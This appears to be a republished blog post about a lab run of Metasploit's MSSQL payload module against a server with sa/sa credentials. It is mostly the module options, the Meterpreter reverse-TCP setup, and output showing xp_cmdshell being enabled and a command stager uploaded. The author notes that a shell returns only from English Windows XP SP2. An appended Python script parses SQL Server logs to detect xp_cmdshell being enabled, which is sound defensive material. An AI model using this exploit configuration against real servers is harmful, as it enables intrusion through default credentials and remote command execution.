  • Exploit completed, but no session was created.

    I ran a Metasploit experiment on Kali. The steps were as follows:

    msf5 exploit(windows/mssql/mssql_payload) > show options
    
    Module options (exploit/windows/mssql/mssql_payload):
    
       Name                 Current Setting  Required  Description
       ----                 ---------------  --------  -----------
       METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
       PASSWORD             sa               no        The password for the specified username
       RHOSTS               192.168.0.20     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT                1433             yes       The target port (TCP)
       SRVHOST              0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT              8080             yes       The local port to listen on.
       SSL                  false            no        Negotiate SSL for incoming connections
       SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
       TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
       URIPATH                               no        The URI to use for this exploit (default is random)
       USERNAME             sa               no        The username to authenticate as
       USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.0.22     yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf5 exploit(windows/mssql/mssql_payload) > exploit
    
    [*] Started reverse TCP handler on 192.168.0.22:4444 
    [*] 192.168.0.20:1433 - The server may have xp_cmdshell disabled, trying to enable it...
    [*] 192.168.0.20:1433 - Command Stager progress -   1.47% done (1499/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -   2.93% done (2998/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -   4.40% done (4497/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -   5.86% done (5996/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -   7.33% done (7495/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -   8.80% done (8994/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  10.26% done (10493/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  11.73% done (11992/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  13.19% done (13491/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  14.66% done (14990/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  16.13% done (16489/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  17.59% done (17988/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  19.06% done (19487/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  20.53% done (20986/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  21.99% done (22485/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  23.46% done (23984/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  24.92% done (25483/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  26.39% done (26982/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  27.86% done (28481/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  29.32% done (29980/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  30.79% done (31479/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  32.25% done (32978/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  33.72% done (34477/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  35.19% done (35976/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  36.65% done (37475/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  38.12% done (38974/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  39.58% done (40473/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  41.05% done (41972/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  42.52% done (43471/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  43.98% done (44970/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  45.45% done (46469/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  46.91% done (47968/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  48.38% done (49467/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  49.85% done (50966/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  51.31% done (52465/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  52.78% done (53964/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  54.24% done (55463/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  55.71% done (56962/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  57.18% done (58461/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  58.64% done (59960/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  60.11% done (61459/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  61.58% done (62958/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  63.04% done (64457/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  64.51% done (65956/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  65.97% done (67455/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  67.44% done (68954/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  68.91% done (70453/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  70.37% done (71952/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  71.84% done (73451/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  73.30% done (74950/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  74.77% done (76449/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  76.24% done (77948/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  77.70% done (79447/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  79.17% done (80946/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  80.63% done (82445/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  82.10% done (83944/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  83.57% done (85443/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  85.03% done (86942/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  86.50% done (88441/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  87.96% done (89940/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  89.43% done (91439/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  90.90% done (92938/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  92.36% done (94437/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  93.83% done (95936/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  95.29% done (97435/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  96.76% done (98934/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  98.19% done (100400/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress -  99.59% done (101827/102246 bytes)
    [*] 192.168.0.20:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
    [*] Exploit completed, but no session was created.
    msf5 exploit(windows/mssql/mssql_payload) > 
    

    What is frustrating is the last line:

    Exploit completed, but no session was created.

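    After going through the usual moves, no shell came back. I tried many things, changing the target machine's operating system and changing the Metasploit version, but nothing worked no matter what I tried. In the end I found the answer in a book: the target has to run the English version of Windows XP SP2. Important things get said three times: "English version", "English version", "English version".
    After switching, the shell did come back as expected. As for other systems, especially Chinese-language ones, I don't know how to get it working.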
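For defenders, the `trying to enable it...` line in the output above corresponds to a configuration change that SQL Server writes to its error log. The following added example (not part of the original post) scans ERRORLOG text for `xp_cmdshell` being switched on and ties it to the preceding SQL-authentication login. The sample lines are constructed, and the login correlation assumes the server audits successful logins.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in SQL Server ERRORLOG format (not taken from the original post).
SAMPLE_ERRORLOG = """\
2020-01-01 10:02:10.98 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.0.22]
2020-01-01 10:02:11.20 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-01 10:02:11.45 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-01 11:30:00.10 spid60      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
2020-01-01 12:00:00.00 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2020-01-01 13:00:00.00 spid70      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

# "<timestamp> <source> <message>" layout of an ERRORLOG line.
LINE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+(\S+)\s+(.*)$")
LOGIN = re.compile(
    r"Login succeeded for user '([^']+)'\. "
    r"Connection made using SQL Server authentication\. \[CLIENT: ([^\]]+)\]"
)
ENABLED = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1\.")


def find_xp_cmdshell_enables(log_text, window_seconds=60):
    """Return one finding per 'xp_cmdshell' 0 -> 1 change, with the most
    recent SQL-auth login attached when it happened within the window."""
    findings = []
    last_login = None  # (timestamp, user, client address)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # continuation lines and blanks carry no timestamp
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        source, message = m.group(2), m.group(3)
        login = LOGIN.search(message)
        if login:
            last_login = (ts, login.group(1), login.group(2))
        elif ENABLED.search(message):
            finding = {"time": ts, "spid": source, "user": None, "client": None}
            if last_login and ts - last_login[0] <= timedelta(seconds=window_seconds):
                finding["user"], finding["client"] = last_login[1], last_login[2]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_xp_cmdshell_enables(SAMPLE_ERRORLOG):
        print(f["time"], f["spid"], f["user"], f["client"])
```

A finding with no attached login, like the last one in the sample, still warrants review: the change may have come from a session opened long before, or from a login type this pattern does not cover.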

  • Original article: https://www.cnblogs.com/shanmao/p/12045560.html